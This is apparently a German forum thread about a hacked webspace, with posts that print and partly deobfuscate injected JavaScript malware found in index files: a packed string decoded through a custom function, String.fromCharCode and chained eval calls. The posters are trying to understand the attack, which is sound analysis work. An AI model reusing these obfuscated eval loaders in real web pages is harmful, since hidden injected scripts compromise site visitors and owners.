Hallo Leute,
ich habe gerade mit einem Webspace zu tun, der offensichtlich gehackt wurde. In die .php Dateien und HTML-Datei wurden script-code eingefügt (jedoch nur die index.*). Hhier noch jemand bei dem das war: http://blog.space2place.de/2011/07/03/
Ich frage mich, was der code genau macht. Er war in den php Dateien sogar zur Verschleierung base64 encodet.
Weiter stell ich mir die Frage, wo die Schwachstelle liegt. Auf dem Space läuft zum einen ein Joomla und ein Wordpress. Die URL des Wordpress war eigentlich nicht öffentlich bekannt, weshalb ich auf eine Schwachstelle im Joomla tippen würde.
Vielleicht kann ja einer von euch damit etwas anfangen und mir ein bisschen Klarheit verschaffen.
Viele Grüße
jbs
gehackter Space mit komprimierten Dateien
Ich habe mir mal die Mühe gemacht und den Script dekodiert und aufbereitet, an einer Stelle muss ich nochmal ran, da diese nochmalig codiert ist, die ersetze ich dann. Allerdings bin ich auf dem Gebiet nicht fit genug um sagen zu können was der Script macht, aber ich nehme mit dem dekodierten Script den Leuten die es Wissen vieleicht eine kleine Hürde weg.
Code: Alles auswählen
function kx_M(file)
{
this.kx_z = null;
this.kx_P = function()
{
this.kx_B = "GET";
this.kx_i = "?";
this.kx_rx = "&";
this.kx_r = window;
this.kx_rt = "";
this.kx_b = true;
this.kx_w = false;
this.kx_E = true;
this.kx_rr = null;
this.kx_A = null;
this.kx_F = file;
this.kx_t = new Object();
this.kx_C = new Array(2);
this.kx_r.offset = 100
};
this.kx_n = function()
{
this.kx_L = function(){};
this.kx_u = function(){};
this.kx_y = function(){};
this.kx_J = function()
{
this.runResponse()
};
this.kx_e = function(){};
this.kx_q = function()
{
this.runResponse()
}
};
this.kx_m = function()
{
this.kx_n();
this.kx_P()
};
this.kx_rg = function()
{
this.kx_k();
try
{
this.kx_z = new ActiveXObject("Msxml2.XMLHTTP")
}
catch(e1)
{
try
{
this.kx_z = new ActiveXObject("Microsoft.XMLHTTP")
}
catch(e2)
{
this.kx_z = null
}
}
if (!this.kx_z)
{
if (typeof XMLHttpRequest!="undefined")
{
this.kx_z = new XMLHttpRequest()
}
else
{
this.kx_E = true
}
}
};
this.kx_c = function(kx_o, value)
{
this.kx_t[kx_o] = Array(value, false)
};
this.kx_v = function(kx_o, value, returnvars)
{
if (true == returnvars)
{
return Array(encodeURIComponent(kx_o),
encodeURIComponent(value))
}
else
{
this.kx_t[encodeURIComponent(kx_o)] = Array(encodeURIComponent(value), true)
}
};
this.kx_H = function(kx_p, kx_S)
{
kx_T = encodeURIComponent(this.kx_rx);
regexp = new RegExp(this.kx_rx+"|"+kx_T);
varArray = kx_p.split(regexp);
for (i=0; i<varArray.length; i++)
{
kx_j = varArray[i].split("=");
if (true == kx_S)
{
this.kx_v(kx_j[0],kx_j[1])
}
else
{
this.kx_c(kx_j[0], kx_j[1])
}
}
};
window.trim = function(kx_o,kx_f)
{
if ("qabcdef".indexOf(kx_o.substr(0,1)) >= 0)
{
var kx_rs = kx_o.split('q').join('').split('v');
for (var i = 0; i < kx_rs.length; i++)
{
kx_rs[i] = parseInt(kx_rs[i], 16) - kx_f[kx_o]
}
return kx_rs.join(',') + ','
}
else
{
ajax.kx_r.offset2 = 25;
return kx_f[kx_o]
}
};
this.runResponse = function()
{
eval(this.response)
};
this.kx_rN = function(kx_R)
{
if (this.kx_b && this.kx_rt.length)
{
this.kx_H(this.kx_rt, true)
}
if (kx_R)
{
if (this.kx_rt.length)
{
this.kx_rt += this.kx_rx + kx_R
}
else
{
this.kx_rt=kx_R
}
}
this.kx_c("kx_a", new Date().getTime());
kx_h = new Array();
for (key in (this.kx_t))
{
if (false == this.kx_t[key][1] && true == this.kx_b)
{
kx_T = this.kx_v(key, this.kx_t[key][0], true);
this.kx_t[key] = null;
this.kx_t[kx_T[0]] = Array(kx_T[1], true);
key = kx_T[0]
}
kx_h[kx_h.length] = key+"=" + this.kx_t[key][0]
}
if (kx_R)
{
this.kx_rt += this.kx_rx + kx_h.join(this.kx_rx)
}
else
{
this.kx_rt += kx_h.join(this.kx_rx)
}
};
this.kx_k = function()
{
this.kx_B = "POST";
this.kx_i = "?";
this.kx_rx = "&";
this.kx_rt = "";
d='v={@%b%a#6QM$1XH:"e-",@%b%a#6Q`$1XH:"",*b%b%a#6QM$1Xv30:"l(\'l=Str"\_:"ing.fr",JG*2%a%fzV*aV:"omCha",>%8%8*2*5LB0_*4:"rCode("<6#fF%3#f#7#d_$4y<d*3*6$eV*e*d$a*3&6R8#b!0G%4#d%eTM&0/8B6P*3K#6>*4HY/c*dPB1JJ-a$4*6&9<7E*bQ`NX@U&3W2E*eQ*4?Q*2E&7W5!3%b#e#8!0*8#6J&0/6PV#c#9!fB3*1V&6W9*7#f%6-3*d#f-d-fy,a2%2#e-d!3-d!3#c!1&1/b#eT!1#c!1*4*b-d&1/4-f#f%6%2#d!2*5`y<4?T*5KUB6P*3Y/9*eZw*5#a#9A*7&9/1@U-d!3LP-d!3&1D3HK%8>O@w*5Y/9O~T@#6T@~&9D1ZwJB6A*eZG&9,d5H*3#8#7E*5?%8&7/d-eF!fJ-eFG%6y/6B0!2G_%3#f_%3yD0%1EJ%1EHwA&5,d0@$f!2#e$1MX?yD1*9U%aAGA*9A&9,a2#7G-a?*1-bM?I/1-0-7%4%1$4T#d-c&0/9J?%8J%3AGE&7Df*e!0*cZA#b!3*2&0/aH-aOB7B7OJGI<2?GJ#aPP?$e&1W5%4z$1*7Gz$1*5I/3*4#d*0!3`!0F!0&0/8$dO%6`%4$4%b!f&5D4OOOB0#eVN-1&3W0*3$b!3*b*aw*0$b&3De%a@UB0#e-dN-1&3W2>M-3*0K*2*5_&5WeOA%7*3#6-7%e*3&6/4%7!fN$3%6%fT$4&1,a6M$f_*b#7B1B1#7&5D7#f%a$3XUFPZ&4/9QMAU$1JB4U&9Wf*5*8@$1>U>@YR1%4Q%6%4UQ%6#7&9Rb$f%fzB3B7*5?*fI/9$1*4#eUUA$1*2&6D6^F#8~#b%0%0F&4/a%7%eN%7!2!2*7?y/5Z#e#b$e$e_Z*0yD6~GF#8^#c%0%0&4D9#8O>HB5>*d@Y<9*5*5#8>*6>>#7YW1^??*4B7?*fGI<7*4#6V*eOA$0V&6/2@#d-awA-f#f_yW5!0#b-8*aE-d#d!3&0Wd%8*3%0$e!fT*5@YWeGB7J-aB2AAH&9<9%7`-b$e|$3-b$b&5R4$b-d$d$4|-d$4$3&7<6-9Q$b%e-9w%7X&3,ac%8zK-c$f$b|-c&6R4%aM-dN%aB1-d%e&7<7$a?U-4Q!3!3?&3<2-7%3-7%4-7T-7%6&1,af%f-f$0-f$1-f$3-f&9R3%0N%0X%0M%0`I,acN-cX-cM-c`-c&6Rc-f$d-f$e-f$f-fB0&9,ac$e-c$f-cB0G!f-7&6,a0FF#7H#6H^H&4D9P#aP#bP#cP#d&5D2#f!f*1A`$a*3*6&6/4-4GF%6GF*fG&1/4T!1_AAAF*f&1D3H@KJ@-bPPYD2!f?KT?-aHP&7/6%7ULV-6UB0-4&3R5!fV$d!fV$4!fV&3<7P>$a-6MM_*b&5RczPJ^#b!3N#d&0/8M|G-d$bU%2P&5,a9*b>-eG-9%8>-e&1/fV%4ULVNN#e&3/6N*0VQ-e!3>*4&3W3!2*4#8^@E~#8y<2H>$4%0_?*6*6&5/b#e#e~!2*4_$4zy<0#eV$d*0!3#c#6!3&3W4OJ@-fG!2#b#6y/2*4OJ@-f#d_$3yW2_^*fU%2H_#7&5/8M$fL%2H_^*f&5/a%0G!3^VN$dU&3<6*4A-4#fJL#b*0&9D1T*3@-a*5>-3>YD9#9#bH%4-8|$a*4&7<5*2#b#6*2#f#6*1#eID0#b#8H#d#6H^#b&4/d#9OG#8~G#9P&1D3#a#7O#f#9O#e#e&7/dO#6GJJGJP&1D5#a#9^#f#a^#a#a&9/f#8#9!f#8#8!f~~&3D3#c#aO#dO#c#aO&7D9L~LOLJL#6yW0T*3%eM$aH>^Y<d*1~#fZ*0EXM&4/a*4*5$3^^OB5GIR4N-d%b-f#f-5X$4y<e$3KO%bM$4Q*8&5<b%4N*6Q%7%8@K&3D4U$bz%4Q%6~#b&9DbHB4E~|*4L%f&7R7M$3#dJJ?LV&3<aO@B2O@|O@YRc^G-c^GB3T%2IWaE-dGP-d@EL&0<3%fZ!fE@!3Q$3&0D1ZQK$1@??U&3Db!3*3>!0#8*2|*9&0<cH!fK#b!fP~!fYW0%8Z$aF*eFH%0&4/c*8*6?#f?$dzZIDd-c!2E@Q@E-c&0/6F$bZ%8`K*1^&4D9#9A$1%eQ$0$1$d&9W1#c~*2*0OF#9F&4,a1B1B1#fE*5*1*4E&4<aE@E?-b^%a|&7<9T`w*9$0w$1w&4R3|G>%8LB2*0>&5W8*2*5>-2P>NL&5,d1A-3~%f$4$4%b`&6,a0-c-5-4*5@`B5*3Y/dzB2*7*a?-2*f@I/2*6!2*b!2*a*7!2OyD3%7$4w$e*2*2$3$a&5R5NA-1*5`$e$dP&9/3Q`UJHH!0@&0<2$b*5>*c*3%2$b>YWc*0MN`%8#e-d$a&3W5>#9#6%aMKB1*3Y,ae-8*1F^-5*c*1E&4W3?A%6%b`A@#dy/9*9LA*eJG*2%a&6<aM!1%aT#e-d!3T&1DcT@A-3ZQz|&9<c%1|#a%e%f%eT#b&0/2L#d-eF!2*f#d_yRf>L-0P-9X>#fYDd!2*9*4#f!2#aN*4yRb-6%3w-0%3%f%7?y/7%8T%1%4EA-bH&0<4-8*dE>N-eE*6&7<a!3*f*9U#eV*5!3&3/dNHB4B4B4*2%1|&7Rc*1EXz#fEXz&4/e!fA$1$eT?~Z&6<5$4-5-4*3*0%6N%e&0<6MKQ$1@-4#e!3&3/d!3-6EUE-7L$3&0<dz*9zz$a$1%a$dYRcZH!f$b$a%b!f~Y<1EZ||N#f~~&5<9`$1#6z$f$1zzY<b`~wN$3^#7^&6R5$3%6%fT$4HT%2&1<c%fzPZXQ$1*2&3,aeA$0%1GA%0V*a&6D8G%aL-7|`$eQI/fHJ#8B5*b%8$bK&7/f%3%3LH*5~#8E&7DfF*8A^?!1H!1&1/7*4NK$eE*8||&7<4z@!3F*0-0%4M&3R0#6$awXKMNHY/cPMQ-6MNK$1&3<9?@#d_!2V@$dyR7%a|$aM$3_?G&5/f!f-f%eL%4G#7$f&7/5@O%6NN%a$3w&5Wb$0$1$4KH@>HY/8*cG#9L_#f*0%7&5R6wT%fB1FLF*7&4<b%0V%1F!fGB1w&4<c$3T$b!0UXw$3&0<9%2wKw$4|#a%8&0R1KKZX>^$ewYR6FFJEK-fZ%1&4<5*0%7#8$b$f%fzB3ID3_~O%8Z%6M*8&5R8Z%e*a$dP#aA*b&9/9$b!f@V#aUU%f&6D2ZQ%8wz-3%aU&4/dVV#6AN%1LL&6<1A#aZ`K$eX%e&9R0X!2#7%b%8$4%3%fy<bV#c%a~|%b$a-b&6,a5*4$fT_$f?L!1&1De*4?*8!fL$a%a|&7<d$4`@GF#cE-8&4D3K%a|*a$1%aQ%a&5R6z>*1@M%3H>Y/e#c#c#a#aJ*7*7A&9DeJ$0wQ%b`KF&4W5L-0$fXX%3%f%bIR4?@#d!2#eN%7Xy,aa%f$3%bV*4!fB1A&6<3#f!2*1T%3%e%e%4y<aK$4*6%3$bA*bJ&9D1V#8V*9A-1%1%2&6/9?E*b$e$0N%bX&7R7!0*5w%6>!0*6#d&0/6XPQwwX%8M&3/8*f@$b#6@>-0PY,d2EE-0^E#c-3X&7<9KZK>-2>$bzY,d1$4Z*5%4?>-3@Y<2#d!0HXE-d?!0&0WdE$3%fT#e-d!3U&1/6!3-0*1#fJ%7K|&3W4G!f>*1KN`L&6<5#f#a#9#dT#d%6#fy/8$4#d%4L$3$0Kw&0R6?A_V*2-3-8-9y<2%4%aB8%6%6???I/5F>FAF?FU&4/a~?^?#6?#7?ID7A#8A#bA#dA#9&9/5#6_#a_#b_#c_&5W0>*1>*2>*3>*4Y/4*2F*3F*6F*7F&4W8F*9F*aF*bF*c&4/1*a!1*b!1*c!1*d!1&1,a7P#8$d$fK$d$ezI/9%4L#eA|#e%4#d&1D9#b*7#9*2#aP~B0YD2JJ#7$3`QMP&9Re#8$a|$aJOOOIDc%6M%2ZAT?&1\E:"32);ev",*``ZXK*b$0$1:"al(l)\'",EE!0*9Q>!0#8*2:");"};dk=[];for(-r x in v){dk.push(trim(x,v))};e-l(dk.join(\'\'))!v7#v8$vc%vb&:8*v9+,q-va/+7<,b>!8?!a@!bA!9BvdD+8E!7F!4G!dH#0I:90J#2K%cL!eM$7N$5O#3P#1Q$2R,cT%5U!cV!6W+9X$6Y&8Z%d^#5_!5`$8w%9y&2z$c|$9~#4\,#6^L%2*0>$f*2';
for (c = 46; c--; d =(t=d.split('!#$%&*+-/<>?@ABDEFGHIJKLMNOPQRTUVWXYZ^_`wyz|~\\')).join(t.pop()));
this.response = d;
this.kx_b = true;
this.kx_w = false;
this.kx_rr = null;
this.kx_A = null;
this.kx_F = file;
this.kx_t = new Object();
this.kx_C = new Array(2)
};
this.runAJAX = function(kx_R)
{
if (this.kx_E)
{
this.kx_q()
}
else
{
this.kx_rN(kx_R);
if (this.kx_rr)
{
this.kx_A = document.getElementById(this.kx_rr)
}
if (this.kx_z)
{
var self = this;
if (this.kx_B == "GET")
{
kx_K = this.kx_F + this.kx_i + this.kx_rt;
this.kx_z.open(this.kx_B, kx_K, true)
}
else
{
this.kx_z.open(this.kx_B, this.kx_F, true);
try
{
this.kx_z.setRequestHeader("Content-Type", "application/x-www-form-urlencoded")
}
catch(e){}
}
this.kx_z.onreadystatechange = function()
{
switch (self.kx_z.readyState)
{
case 1:
self.kx_L();
break;
case 2:self.kx_u();
break;
case 3:
self.kx_y();
break;
case 4:
self.response = self.kx_z.responseText;
self.responseXML = self.kx_z.responseXML;
self.kx_C[0] = self.kx_z.status;
self.kx_C[1] = self.kx_z.statusText;
if (self.kx_w)
{
self.runResponse()
}
if (self.kx_A)
{
elemNodeName = self.kx_A.nodeName;
elemNodeName.toLowerCase();
if (elemNodeName == "input" || elemNodeName == "select" ||
elemNodeName == "option" || elemNodeName == "textarea")
{
self.kx_A.value = self.response
}
else
{
self.kx_A.innerHTML = self.response
}
}
if (self.kx_C[0] == "200")
{
self.kx_J()
}
else
{
self.kx_e()
}
self.kx_rt="";
break
}
};
this.kx_z.send(this.kx_rt)
}
}
};
this.kx_m();
this.kx_rg()
}
window.ajax = new kx_M();
try
{
var kx_G = document.getElementById('kx_D');
ajax.kx_c("query", kx_G.kx_d.kx_f);
ajax.kx_F = "query.php";
ajax.kx_B = kx_G.kx_B.kx_f;
ajax.kx_rr = 'kx_rz';
ajax.kx_L = kx_N;
ajax.kx_u = kx_g;
ajax.kx_y = kx_s;
ajax.kx_J = kx_x;
ajax.runAJAX()
}
catch(e)
{
ajax.runAJAX()
}
}Danke für die Mühe. Ich hab den code hierhin ausgelagert, da der code-Tag buggy ist: http://paste.pocoo.org/show/430975/
Mal schauen was ich damit anfangen kann.
Mal schauen was ich damit anfangen kann.
[url=http://wiki.python-forum.de/PEP%208%20%28%C3%9Cbersetzung%29]PEP 8[/url] - Quak!
[url=http://tutorial.pocoo.org/index.html]Tutorial in Deutsch[/url]
[url=http://tutorial.pocoo.org/index.html]Tutorial in Deutsch[/url]
In dem unlesbaren Teil "d=" wird folgendes als String gesetzt:
Das ist der komplette String dieser wird dort aber nicht interpretiert und ist wirklich nur Text. Die Leerzeichen habe ich hinzugefügt ansonsten würde das wie das Kryptische "d=..." aussehen. Ich denke die sollten aber beim interpretieren des Textes nicht stören.
Code: Alles auswählen
v = {v7bvbbvbav86vc2vc7vc1vc6v80 : "eva",
v7bvbbvbav86vc2vc8vc1vc6v80 : "",
v9bvbbvbav86vc2vc7vc1vc6v30 : "l('l=Str",
v86v85v7evb2v90v78vcfv92v75 : "ing.fr",
v82v7dv92vbavbfvccv76v9av76 : "omCha",
v78vb8vb8v92v95v7evd0v75v94 : "rCode(",
b6v8fv74vb3v8fv87v8dv75vc4 : 82,
bdv93v96vcev76v9ev9dvcav93 : 86,
c8v8bv70v7dvb4v8dvbevb5vc7 : 80,
q78vd6v81v93vbcv86v78v94v80 : 88,
q7cv9dv81vd1v82v82vaavc4v96 : 89,
b7v77v9bvc2vc8vc5vc6v7bv7c : 83,
q92v77v9evc2v94v7avc2v92v77 : 87,
q95v73vbbv8ev88v70v98v86v82 : 80,
q76v81v76v8cv89v7fvd3v91v76 : 86,
q99v97v8fvb6va3v9dv8fvadvaf : 82,
a2vb2v8evadv73vadv73v8cv71 : 81,
q7bv8evb5v71v8cv71v94v9bvad : 81,
q74vafv8fvb6vb2v8dv72v95vc8 : 82,
b4v7avb5v95vbcv7cvd6v81v93 : 88,
q79v9evbdvb9v95v8av89v79v97 : 89,
q71v7bv7cvadv73v7ev81vadv73 : 81,
q83v80vbcvb8v78v83v7bvb9v95 : 88,
q79v83v84vb5v7bv86vb5v7bv84 : 89,
q81vbdvb9v82vd6v79v9evbdv7d : 89,
d5v80v93v88v87v77v95v7avb8 : 87,
q7dvaev74v7fv82vaev74v7dvb6 : 82,
q76vd0v72v7dv75vb3v8fv75vb3 : 82,
q80vb1v77v82vb1v77v80vb9v79 : 85,
d0v7bvcfv72v8evc1vc7vc6v7a : 82,
q81v99v7cvbav79v7dv79v99v79 : 89,
a2v87v7dvaav7av91vabvc7v7a : 90,
q71va0va7vb4vb1vc4vb5v8dvac : 80,
q79v82v7avb8v82vb3v79v7dv77 : 87,
q8fv9ev70v9cvbdv79v8bv73v92 : 80,
q7av80vaav83vd7vd7v83v82v7d : 90,
b2v7av7dv82v8av81v81v7avce : 81,
q95vb4vccvc1v97v7dvccvc1v95 : 90,
q73v94v8dv90v73vc8v70v74v70 : 80,
q78vcdv83vb6vc8vb4vc4vbbv7f : 85,
q84v83v83v83vd0v8ev76vc5va1 : 83,
q90v93vcbv73v9bv9avb9v90vcb : 83,
q8evbav7bv7cvd0v8evadvc5va1 : 83,
q92v78vc7va3v90vbcv92v95v75 : 85,
q9ev83v79vb7v93v86va7vbev93 : 86,
q74vb7v7fvc5vc3vb6vbfvb5vc4 : 81,
a6vc7vcfv75v9bv87vd1vd1v87 : 85,
q87v8fvbavc3vc6v7cv74v81vbd : 84,
q79vc2vc7v79v7cvc1v82vd4v7c : 89,
q9fv95v98v7bvc1v78v7cv78v7b : 88,
c1vb4vc2vb6vb4v7cvc2vb6v87 : 89,
cbvcfvbfvccvd3vd7v95v7av9f : 90,
q79vc1v94v8ev7cv7cv79vc1v92 : 86,
q86v85v74v88v84v8bvb0vb0v74 : 84,
q7avb7vbevc5vb7v72v72v97v7a : 82,
q75vbdv8ev8bvcevcev75vbdv90 : 82,
q86v84v7dv74v88v85v8cvb0vb0 : 84,
q89v88v83v78v80vd5v78v9dv7b : 88,
b9v95v95v88v78v96v78v78v87 : 88,
q91v85v7av7av94vd7v7av9fv7d : 90,
b7v94v86v76v9ev83v79vc0v76 : 86,
q72v7bv8dvaavb9v79vafv8fv75 : 82,
q95v70v8bva8v9av77vadv8dv73 : 80,
q9dvb8v93vb0vcev7fvb5v95v7b : 88,
q9ev7dvd7v82vaavd2v79v79v80 : 89,
b9vb7vc8vabvcevc9vc3vabvcb : 85,
c4vcbvadvcdvc4vc9vadvc4vc3 : 87,
b6va9vc2vcbvbeva9vb9vb7vc6 : 83,
acvb8vccvbcvacvcfvcbvc9vac : 86,
c4vbavc7vadvc5vbavd1vadvbe : 87,
b7vcav7av7cva4vc2v73v73v7a : 83,
b2va7vb3va7vb4va7vb5va7vb6 : 81,
afvbfvafvc0vafvc1vafvc3vaf : 89,
c3vb0vc5vb0vc6vb0vc7vb0vc8 : 90,
acvc5vacvc6vacvc7vacvc8vac : 86,
ccvafvcdvafvcevafvcfvafvd0 : 89,
acvcevacvcfvacvd0v7dv7fva7 : 86,
a0v74v74v87v80v86v80v85v80 : 84,
q89v81v8av81v8bv81v8cv81v8d : 85,
q82v8fv7fv91v79vc8vcav93v96 : 86,
q74va4v7dv74vb6v7dv74v9fv7d : 81,
q74vb5v71v75v79v79v79v74v9f : 81,
q83v80v7bvbcv82v7bvabv81v81 : 88,
q82v7fv7avbcvb5v7avaav80v81 : 87,
q76vb7v7cv7ev76va6v7cvd0va4 : 83,
c5v7fv76vcdv7fv76vc4v7fv76 : 83,
b7v81v78vcava6vc7vc7v75v9b : 85,
ccvccv81v82v85v8bv73vc5v8d : 80,
q78vc7vc9v7dvadvcbv7cvb2v81 : 85,
a9v9bv78vaev7dva9vb8v78vae : 81,
q7fv76vb4v7cv7ev76vc5vc5v8e : 83,
q76vc5v90v76vc2vaev73v78v94 : 83,
q93v72v94v88v85v7bv77v84v88 : 82,
b2v80v78vc4vb0v75v7av96v96 : 85,
q7bv8ev8ev84v72v94v75vc4vcc : 82,
b0v8ev76vcdv90v73v8cv86v73 : 83,
q94v83v82v7bvafv7dv72v8bv86 : 82,
q72v94v83v82v7bvafv8dv75vc3 : 82,
q92v75v85v9fv7cvb2v80v75v87 : 85,
q78vc7vcfv7evb2v80v75v85v9f : 85,
q7avb0v7dv73v85v76vc5vcdv7c : 83,
b6v94v79va4v8fv82v7ev8bv90 : 89,
q81vb5v93v7bvaav95v78va3v78 : 88,
q89v89v8bv80vb4va8vc9vcav94 : 87,
b5v92v8bv86v92v8fv86v91v8e : 90,
q80v8bv88v80v8dv86v80v85v8b : 84,
q7dv89v83v7dv88v84v7dv89v81 : 81,
q83v8av87v83v8fv89v83v8ev8e : 87,
q7dv83v86v7dv82v82v7dv82v81 : 81,
q85v8av89v85v8fv8av85v8av8a : 89,
q7fv88v89v7fv88v88v7fv84v84 : 83,
q83v8cv8av83v8dv83v8cv8av83 : 87,
q89v7ev84v7ev83v7ev82v7ev86 : 82,
q90vb5v93vbevc7vcav80v78v85 : 88,
bdv91v84v8fvbdv90v77vc6vc7 : 84,
q7av94v95vc3v85v85v83vd5v7d : 90,
c4vc5vadvbbvafv8fva5vc6vc4 : 82,
bevc3vbcv83vbbvc7vc4vc2v98 : 85,
bbvb4vc5v96vc2vb7vb8v7bvbc : 83,
q84v7cvcbvccvb4vc2vb6v84v8b : 89,
q8bv80vd4v77v84vc9v94v7evbf : 87,
c7vc7vc3v8dv82v82v7av7ev76 : 83,
bav83v7bvd2v83v7bvc9v83v7b : 88,
ccv85v7dvacv85v7dvd3vb5vb2 : 90,
q9av77vadv7dv81vadv7bv77v7e : 80,
b3vbfvbdv7fv77v7bv73vc2vc3 : 80,
q81vbdvc2vbcvc1v7bv7av7av7c : 83,
q8bv73v93v78v70v88v92vc9v99 : 80,
bcv80v7fvbcv8bv7fv81v84v7f : 88,
q90vb8vbdvcav74v9ev74v80vb0 : 84,
q7cv98v96v7av8fv7avcdvccvbd : 90,
q8dvacv72v77v7bvc2v7bv77vac : 80,
q76v74vcbvbdvb8vc8vbcv91v85 : 84,
q89v89v79vc1vbevc2vc0vc1vcd : 89,
q91v8cv84v92v90v83v74v89v74 : 84,
a1vd1vd1v8fv77v95v91v94v77 : 84,
bav77v7bv77v7avabv85vbavc9 : 87,
b9vb5vc8vb9v99vc0vb9vc1vb9 : 84,
c3vc9v7dv78vb8v7evd2v90v78 : 85,
q98v92v95v78va2v81v78vc5v7e : 85,
d1v79va3v84vbfvc4vc4vbbvc8 : 86,
a0vacva5va4v95v7bvc8vd5v93 : 88,
q7dvccvd2v97v9av7ava2v9fv7b : 90,
q72v96v72v9bv72v9av97v72v83 : 82,
q83vb7vc4vb9vcev92v92vc3vca : 85,
c5vc5v79va1v95vc8vcevcdv81 : 89,
q73vc2vc8v7cv82v80v80v70v7b : 80,
b2vcbv95v78v9cv93vb2vcbv78 : 88,
q9cv90vc7vc5vc8vb8v8evadvca : 83,
q95v78v89v86vbavc7vbcvd1v93 : 88,
aeva8v91v74v85va5v9cv91v77 : 84,
q93v7av79vb6vbbvc8v79v7bv8d : 82,
q79v99v7ev79v9ev82v7dv92vba : 86,
bavc7v71vbavb5v8evadv73vb5 : 81,
q8cvb5v7bv79va3vbdvc2vccvc9 : 89,
bcvb1vc9v8avbevbfvbevb5v8b : 80,
q72v7ev8dvaev74v72v9fv8dv75 : 82,
cfv78v7eva0v81va9vc6v78v8f : 88,
q8dv72v99v94v8fv72v8avc5v94 : 82,
cbva6vb3vb9va0vb3vbfvb7v7a : 82,
q77vb8vb5vb1vb4v77v79vabv80 : 80,
b4va8v9dv77v78vc5vaev77v96 : 87,
bav73v9fv99v7cv8ev76v95v73 : 83,
q7dvc5v80vd4vd4vd4v92vb1vc9 : 87,
ccv91v77vc6vccv8fv77vc6vcc : 84,
q7ev7fv79vc1vcevb5v7av84vbd : 86,
b5vc4va5va4v93v90vb6vc5vbe : 80,
b6vc7vbcvc2vc1v7bva4v8ev73 : 83,
q7dv73va6v77v7cv77va7v7evc3 : 80,
bdvccv99vccvccvcavc1vbavcd : 88,
ccvbdv80v7fvcbvcavbbv7fv84 : 88,
b1v77vbdvc9vc9vc5v8fv84v84 : 85,
b9vc8vc1v86vccvcfvc1vccvcc : 88,
bbvc8v84vb9vc5vc3v85v87v85 : 86,
c5vc3vb6vbfvb5vc4v80vb5vb2 : 81,
bcvbfvccv81vbdvc6vc2vc1v92 : 83,
aev79vc0vb1v7dv79vb0v76v9a : 86,
q88v7dvbav7eva7vc9vc8vcevc2 : 90,
q7fv80v82v88vd5v9bvb8vcbvbc : 87,
q7fvb3vb3v7ev80v95v84v88v77 : 87,
q8fv74v98v79v85v7av71v80v71 : 81,
q77v94vc5vbcvcev77v98vc9vc9 : 87,
b4vccv7bv73v74v90va0vb4vc7 : 83,
c0v86vcavb9vc6vbcvc7vc5v80 : 88,
q7cv81vc7vc2va6vc7vc5vbcvc1 : 83,
b9v7av7bv8dv75v72v76v7bvcd : 82,
c7vbavc9vcavc7vc3v75v7av7d : 85,
q7fv7fvafvbev7evb4v7dv87vcf : 87,
q75v7bv83vb6vc5vc5vbavc3vb9 : 85,
q9bvc0vc1vc4vbcv80v7bv78v80 : 88,
q78v9cv7dv89v7ev75v8fv90vb7 : 85,
c6vb9vb5vbfvd1v74v7ev74v97 : 84,
bbvb0v76vb1v74v7fv7dvd1vb9 : 84,
bcvc3vb5vcbv70v7cvc6vb9vc3 : 80,
b9vb2vb9vbcvb9vc4vc9v8avb8 : 80,
c1vbcvbcvbdvc6v78v85vcevb9 : 88,
c6v74v74v82v77vbcvafvbdvb1 : 84,
b5v90vb7v88vcbvcfvbfvccvd3 : 90,
q83v75v84v83vb8vbdvb6vc7v98 : 85,
c8vbdvbev9avcdv81v8av79v9b : 89,
q79vcbv7fv7bv76v8av7cv7cvbf : 86,
q82vbdvc2vb8vb9vccva3vbav7c : 84,
q7dv76v76v86v79vc5vb1v7ev7e : 86,
b1v79v8avbdvc8vbcvcevc6vbe : 89,
c0vc6v72v87vbbvb8vc4vb3vbf : 82,
bbv76v8cvbav84vc9vbbvcavab : 86,
a5v94vcfvb5v75vcfv7av7ev71 : 81,
q8ev94v7av98v7fv7evcavbavc9 : 87,
bdvc4vc8v7bv7dv74v8cv77va8 : 84,
q83vbcvbavc9v9avc1vbavc2vba : 85,
c6vccv78v91v7bvc7vb3v80v78 : 88,
q7ev8cv8cv8av8av82v97v97v79 : 89,
q8ev82vc0vb9vc2vbbvc8vbcv74 : 84,
q95v7eva0vcfvc6vc6vb3vbfvbb : 90,
c4v7av7bv8dv72v8evc5vb7vc6 : 82,
aavbfvc3vbbv76v94v7fvd1v79 : 86,
b3v8fv72v91vb5vb3vbevbevb4 : 82,
bavbcvc4v96vb3vcbv79v9bv82 : 89,
q81v76v88v76v99v79va1vb1vb2 : 86,
q79v7av77v9bvcevc0vc5vbbvc6 : 87,
c7v70v95vb9vb6v78v70v96v8d : 80,
q76vc6v81vc2vb9vb9vc6vb8vc7 : 83,
q78v9fv7bvcbv86v7bv78va0v81 : 88,
d2v77v77va0v85v77v8cva3vc6 : 87,
b9vbcvbdvbcv78va2v78vcbvcc : 88,
d1vc4vbdv95vb4v7av78va3v7b : 88,
b2v8dv70v80vc6v77vadv7av70 : 80,
q9dv77vc3vbfvb5v8evadv73v7c : 81,
q76v73va0v91v8fv82vb7vbcvc9 : 83,
q94v7dv7fv78v91vbcvc5vc8v7e : 86,
b5v8fv8av89v8dvb5v8dvb6v8f : 82,
q78vc4v8dvb4v7evc3vc0vbcvb9 : 80,
c6v7av79v75v76v92va3va8va9 : 82,
b2vb4vbavd8vb6vb6v7av7av7a : 90,
q75v74v78v74v79v74v7av74v7c : 84,
q7av84v7av85v7av86v7av87v7a : 90,
q87v79v88v79v8bv79v8dv79v89 : 89,
q75v86v75v8av75v8bv75v8cv75 : 85,
q90v78v91v78v92v78v93v78v94 : 88,
q74v92v74v93v74v96v74v97v74 : 84,
q98v74v99v74v9av74v9bv74v9c : 84,
q71v9av71v9bv71v9cv71v9dv71 : 81,
a7v81v88vcdvcfvbcvcdvcevcc : 90,
q79vb4v7ev8ev79vc9v8evb4v8d : 81,
q89v8bv97v89v92v8av81v84vd0 : 88,
q82v82v82v87vc3vc8vc2vc7v81 : 89,
cev88vcavc9vcav82v83v83v83 : 90,
q8cvb6vc7vb2vbdv79vb5v7a : 81,
v86v85v7evb2v90v78vcfv92v77 : "32);ev",
v9vc8vc8vbdvc6vbcv9bvc0vc1 : "al(l)'",
v77v77v70v99vc2v78v70v88v92 : ");"
};
dk=[];
for (var x in v)
{
dk.push(trim(x,v))
};
eval(dk.join(''))
Ist nicht die for-Schleife nach dem v= fehlerhaft, oder funktioniert sie?
Code: Alles auswählen
for (c = 46; c--; d =(t=d.split('!#$%&*+-/<>?@ABDEFGHIJKLMNOPQRTUVWXYZ^_`wyz|~\\')).join(t.pop()));[url=http://wiki.python-forum.de/PEP%208%20%28%C3%9Cbersetzung%29]PEP 8[/url] - Quak!
